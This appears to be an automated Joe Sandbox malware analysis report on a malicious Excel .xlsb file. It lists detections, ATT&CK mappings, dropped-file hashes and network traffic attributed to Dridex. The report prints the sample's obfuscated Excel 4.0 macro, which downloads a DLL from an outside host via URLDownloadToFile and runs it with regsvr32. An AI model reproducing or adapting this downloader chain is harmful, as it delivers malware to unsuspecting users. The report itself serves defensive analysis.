Analysis Report Documents_13134976_1377491379.xlsb
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Classification
Process Tree
Malware Configuration
No configs have been found
Yara Overview
Initial Sample
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | |
Sigma Overview
System Summary:
Sigma detected: BlueMashroom DLL Load (Author: Florian Roth)
Sigma detected: Microsoft Office Product Spawning Windows Shell (Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team)
Sigma detected: Regsvr32 Anomaly (Author: Florian Roth, oscd.community)
Signature Overview
Source: File opened
Source: HTTPS traffic detected (4 entries)
Source: Code function: 5_2_00007FFD696B3714
Source: Code function: 11_2_00007FFD69653714
Software Vulnerabilities:
Document exploit detected (creates forbidden files)
Source: File created (2 entries)
Document exploit detected (drops PE files)
Source: File created
Document exploit detected (UrlDownloadToFile)
Source: Section loaded
Document exploit detected (process start blacklist hit)
Source: Process created
Source: DNS query
Source: TCP traffic (2 entries)
Networking:
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Snort IDS (3 entries)
Uses ping.exe to check the status of other devices and networks
Source: Process created
Source: ASN Name
Source: JA3 fingerprint (2 entries)
Source: TCP traffic detected without corresponding DNS query (22 entries)
Source: DNS traffic detected
Source: String found in binary or memory (172 entries)
Source: Network traffic detected (8 entries)
Source: HTTPS traffic detected (4 entries)
System Summary:
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot OCR (6 entries)
Found Excel 4.0 Macro with suspicious formulas
Source: Initial sample (3 entries)
Office process drops PE file
Source: File created (2 entries)
Source: Code function (142 entries)
Source: Dropped File (3 entries)
Source: Section loaded (7 entries)
Source: Classification label
Source: Code function: 5_2_012D4554
Source: File created
Source: Mutant created (4 entries)
Source: File created
Source: File read
Source: Key opened
Source: File read
Source: Process created (28 entries)
Source: Window detected
Source: Initial sample (6 entries)
Source: Key opened
Source: File opened
Source: Process created
Source: File created (3 entries)
Source: File created
Boot Survival:
Creates an autostart registry key pointing to binary in C:\Windows
Source: Registry value created or modified
Drops PE files to the user root directory
Source: File created
Source: Registry value created or modified (2 entries)
Source: Registry key monitored for changes
Source: Process information set (42 entries)
Malware Analysis System Evasion:
Uses ping.exe to sleep
Source: Process created (6 entries)
Source: Dropped PE file which has not been started
Source: Thread sleep time (7 entries)
Source: Last function (7 entries)
Source: Code function: 5_2_00007FFD696A9D9D
Source: Code function: 11_2_00007FFD69649D9D
Source: Code function: 5_2_00007FFD696B3714
Source: Code function: 11_2_00007FFD69653714
Source: Thread delayed (6 entries)
Source: Binary or memory string (4 entries)
Source: Process information queried
Source: Code function: 5_2_00007FFD696B31A0
Source: Code function: 5_2_00007FFD696A4402
Source: Code function: 5_2_00007FFD696B31A0
Source: Code function: 5_2_00007FFD696B03CC
Source: Code function: 5_2_00007FFD696AFC50
Source: Code function: 11_2_00007FFD696531A0
Source: Code function: 11_2_00007FFD696503CC
Source: Code function: 11_2_00007FFD6964FC50
HIPS / PFW / Operating System Protection Evasion:
System process connects to network (likely due to code injection or exploit)
Source: Network Connect
Source: Process created (6 entries)
Source: File source
Source: Binary or memory string (4 entries)
Source: Code function: 5_2_00007FFD696B8940
Source: Code function: 5_2_00007FFD696B02C8
Source: Key value queried
MITRE ATT&CK Matrix
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | Registry Run Keys / Startup Folder11 | Process Injection112 | Masquerading111 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | DLL Side-Loading1 | Registry Run Keys / Startup Folder11 | Disable or Modify Tools1 | LSASS Memory | Query Registry1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading1 | Virtualization/Sandbox Evasion11 | Security Account Manager | Security Software Discovery21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection112 | NTDS | Virtualization/Sandbox Evasion11 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Process Discovery3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Regsvr321 | Cached Domain Credentials | Remote System Discovery11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | System Network Configuration Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery24 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph
Screenshots
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 2% | ReversingLabs | | |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 6% | Metadefender | | Browse |
| 4% | ReversingLabs | | |
| 6% | Metadefender | | Browse |
| 4% | ReversingLabs | | |
| 6% | Metadefender | | Browse |
| 4% | ReversingLabs | | |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
(every listed URL: 0% detection, rated safe by URL Reputation or Avira URL Cloud; the URL strings themselves are not present in this extract) | 0% | URL Reputation / Avira URL Cloud | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
tpfcu.com | 107.180.50.232 | true | false | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
(every listed URL: Malicious = false, Reputation high or unknown; URL names and sources are not present in this extract) | | false | | high / unknown |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
8.8.7.7 | unknown | United States | 15169 | GOOGLEUS | false |
107.180.50.232 | tpfcu.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false |
18.117.84.120 | unknown | United States | 3 | MIT-GATEWAYSUS | true |
Private |
---|
IP |
---|
192.168.2.1 |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 431937 |
Start date: | 09.06.2021 |
Start time: | 15:20:54 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 8m 4s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Documents_13134976_1377491379.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 35 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLSB@28/13@1/4 |
EGA Information: | Failed |
HDC Information: | |
HCA Information: | |
Cookbook Comments: | |
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
15:22:03 | API Interceptor | |
15:22:35 | Autostart | |
15:22:43 | Autostart |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
18.117.84.120 | | | malicious | Browse | |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-26496-GO-DADDY-COM-LLCUS | (associated samples, all flagged malicious; sample names and SHA-256 values are not present in this extract) | | malicious | Browse | |
MIT-GATEWAYSUS | (associated samples, all flagged malicious; sample names and SHA-256 values are not present in this extract) | | malicious | Browse | |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
8916410db85077a5460817142dcbc8de | (associated samples, all flagged malicious; sample names and SHA-256 values are not present in this extract) | | malicious | Browse | |
37f463bf4616ecd445d4a1937da06e19 | (associated samples, all flagged malicious; sample names and SHA-256 values are not present in this extract) | | malicious | Browse | |
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\L3YD7CE.dll | | | malicious | Browse | |
C:\Users\user\iepfusn.dll | | | malicious | Browse | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll | | | malicious | Browse | |
Created / dropped Files |
---|
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60080 |
Entropy (8bit): | 7.995256720209506 |
Encrypted: | true |
SSDEEP: | 768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4 |
MD5: | 6045BACCF49E1EBA0E674945311A06E6 |
SHA1: | 379C6234849EECEDE26FAD192C2EE59E0F0221CB |
SHA-256: | 65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58 |
SHA-512: | DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB |
Malicious: | false |
Preview: | |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.132472625894721 |
Encrypted: | false |
SSDEEP: | 6:kKgy3Pse8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:4Ks8kPlE99SNxAhUe3OMx |
MD5: | B84815C12C603EC6FB8D1EDA4CA29530 |
SHA1: | CD18E3BC8FCFB385C1225EF5ED0FCF1BD9DF0434 |
SHA-256: | 961CA06C24F3E4B504765841EFB908C623E99B0EC81EBB6804928909F4360E52 |
SHA-512: | 7771C7B0CC1743F21C13270B0B8390410E1BBD9BB849F9DF045F5A9976B99A169328F257CD09403420C24B62275F332CE54909F8603970F07C71C90501984D2F |
Malicious: | false |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134915 |
Entropy (8bit): | 5.369271958078095 |
Encrypted: | false |
SSDEEP: | 1536:lcQIKNEeBXA3gBwlpQ9DQW+z7534ZlCKWXboOilX5ENLWME9:REQ9DQW+zAXOe |
MD5: | 76B550BC14095A4AFBB5E04BE5F42175 |
SHA1: | 2A74379C0333997DFED5BB5F7BDB7F707BAF68E4 |
SHA-256: | 7F1E14B77DF7F3FCEB0C34441CA6F6A68288706308BF5B072FAE111AF6BE0817 |
SHA-512: | 41056D2FD4A84E050F7EDC8F962B02C093AD02F3B2B8E410F424A6E155672AF6BA67D21579EC5B0BF6A56F9E8B71B2B0035C5E6B822B78072D1EB2DCBCA3E94F |
Malicious: | false |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9924 |
Entropy (8bit): | 7.973758306371751 |
Encrypted: | false |
SSDEEP: | 192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB |
MD5: | B34FB4F2F0F9E70B72BA3AFD028CD97C |
SHA1: | C6868336F78DEA1E718965DF3341039581DB5B5A |
SHA-256: | 189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB |
SHA-512: | 4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6 |
Malicious: | false |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6177 |
Entropy (8bit): | 7.959095006853368 |
Encrypted: | false |
SSDEEP: | 96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a |
MD5: | C7ED6FC355D8632DB1464BE3D56BF5CC |
SHA1: | 615484A338922DDF00B903CFA48060AD60D70207 |
SHA-256: | 26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C |
SHA-512: | FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92 |
Malicious: | false |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5744 |
Entropy (8bit): | 7.966496386988271 |
Encrypted: | false |
SSDEEP: | 96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf |
MD5: | 9AD30E24270C495AE68EAF3A1EEECBFB |
SHA1: | 8642D256E7FFBEF5804A2D2220A1FE475A99DC36 |
SHA-256: | 6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20 |
SHA-512: | EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5 |
Malicious: | false |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 956 |
Entropy (8bit): | 7.683552542542939 |
Encrypted: | false |
SSDEEP: | 24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB |
MD5: | 32C83607A5C98C5A634278E5AED3AD61 |
SHA1: | EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362 |
SHA-256: | 4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF |
SHA-512: | AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C |
Malicious: | false |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 23989 |
Entropy (8bit): | 7.989754044300238 |
Encrypted: | false |
SSDEEP: | 384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy |
MD5: | 839795652A8FE78F26F4D86D757ABDE8 |
SHA1: | 979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60 |
SHA-256: | 1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E |
SHA-512: | E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773 |
Malicious: | false |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 205312 |
Entropy (8bit): | 6.709188825960524 |
Encrypted: | false |
SSDEEP: | 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b |
MD5: | 28193BA741232F91101849F606FA8419 |
SHA1: | 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5 |
SHA-256: | 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2 |
SHA-512: | 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
IE Cache URL: | https://tpfcu.com/getfile.php |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 80566 |
Entropy (8bit): | 7.893302821449264 |
Encrypted: | false |
SSDEEP: | 1536:Xelem3l7eO+dRRVnyY7lMVGoIahaDHTU6hryF70cAeWvijWGHc:bol7eO6RSY72sTU2yF70cAijW2c |
MD5: | 5138B6C608292E4C867FC32717C1CF59 |
SHA1: | 836E1C79573D2D8F2E5FCED81BDCA22EEE921EF1 |
SHA-256: | F04037BBF157BEAF7297874FD3700B1059E20B1E6FBF199C61F2B1E112E660C7 |
SHA-512: | 43AF1CC70CD407BBB7BD1B78B98F1054A85A44C96DDAEA6B1AA3AA2D5D0A943659D445D8566010CE5FB177C2597A57FEEA27D5440B8A8D285E2BD5891A31C67C |
Malicious: | false |
Preview: | |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 205312 |
Entropy (8bit): | 6.709188825960524 |
Encrypted: | false |
SSDEEP: | 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b |
MD5: | 28193BA741232F91101849F606FA8419 |
SHA1: | 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5 |
SHA-256: | 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2 |
SHA-512: | 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | true |
Preview: | |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 205312 |
Entropy (8bit): | 6.709188825960524 |
Encrypted: | false |
SSDEEP: | 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b |
MD5: | 28193BA741232F91101849F606FA8419 |
SHA1: | 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5 |
SHA-256: | 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2 |
SHA-512: | 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Preview: | |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.867132102918904 |
TrID: | |
File name: | Documents_13134976_1377491379.xlsb |
File size: | 64636 |
MD5: | 276bf3db434b887bb77adca0bd46e130 |
SHA1: | eee2be9136f2c70a28b6ca5289e73e2a38453da2 |
SHA256: | 27180043ebeb8f2aa8728c5ee020fb5368be3df4e9008b8f01242bf82d5780ce |
SHA512: | abe0052635a1064304828a7b8fa8663997fb023d542944ddb3bdb346170bd5fbe9a76b2e53184e4b3c7a9e09a768982a396b7253d83c309fd7f522f427262e7a |
SSDEEP: | 1536:LvnO2wWjlMVGoIahaDHTU6hryF70liWWGH0AeWl+R:LGCj2sTU2yF70liWW200+R |
File Content Preview: | PK..........!.+...............[Content_Types].xml ...(.....................................................................................................................................................................................!!.................. |
File Icon |
---|
Icon Hash: | 74f0d0d2c6d6d0f4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Documents_13134976_1377491379.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
CALL(before.2.18.46.sheet!BJ29&before.2.18.46.sheet!BN29, before.2.18.46.sheet!BM35&before.2.18.46.sheet!BM38&before.2.18.46.sheet!BS41&before.2.18.46.sheet!BU41&before.2.18.46.sheet!BS25, before.2.18.46.sheet!BK50&before.2.18.46.sheet!BS42, before.2.18.46.sheet!BP33, before.2.18.46.sheet!BJ19&BJ20&BJ21&BJ22, before.2.18.46.sheet!BN24, before.2.18.46.sheet!BP38, before.2.18.46.sheet!BP41)
=EXEC(Sheet1!BF42&Sheet1!BF43&Sheet1!BF44&Sheet1!BN24)
=HALT()
,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,,,,,tps://,,,,,,,,,,,,,,,,,,,,,,,,,,tpfcu.com/getfile.,,,,,,,,,,,,,,,,,,,,,,,,,,php,,,,,,,,,,,"=CALL(before.2.18.46.sheet!BJ29&before.2.18.46.sheet!BN29,before.2.18.46.sheet!BM35&before.2.18.46.sheet!BM38&before.2.18.46.sheet!BS41&before.2.18.46.sheet!BU41&before.2.18.46.sheet!BS25,before.2.18.46.sheet!BK50&before.2.18.46.sheet!BS42,before.2.18.46.sheet!BP33,before.2.18.46.sheet!BJ19&BJ20&BJ21&BJ22,before.2.18.46.sheet!BN24,before.2.18.46.sheet!BP38,before.2.18.46.sheet!BP41)",,,,,,,,,,,,,,,,,,,,,,,,,,=Sheet2!BB10(),,,,,,,,,,,,,,,,,,,..\iepfusn.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownl,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,oa,,dToFile,,,,,,,,,,,re,,,,,,,,,,,,,CBB,,,,,,,,,,,,,gs,,,,,,,,,,,,,,,,,,,,,,,,,,"=""vr32 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
06/09/21-15:22:05.833841 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:05.833841 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:10.528872 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:10.528872 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:20.469415 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:20.469415 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:25.029456 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:25.029456 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:36.677659 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:36.677659 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:41.530548 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:41.530548 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:49.386614 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
06/09/21-15:23:25.363224 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
06/09/21-15:23:57.298792 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 9, 2021 15:21:56.339055061 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339061975 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339081049 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339091063 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339123964 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339133024 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339148045 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339152098 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339169025 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339194059 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339204073 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339221954 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339231968 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339252949 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339261055 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339273930 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339304924 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339309931 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
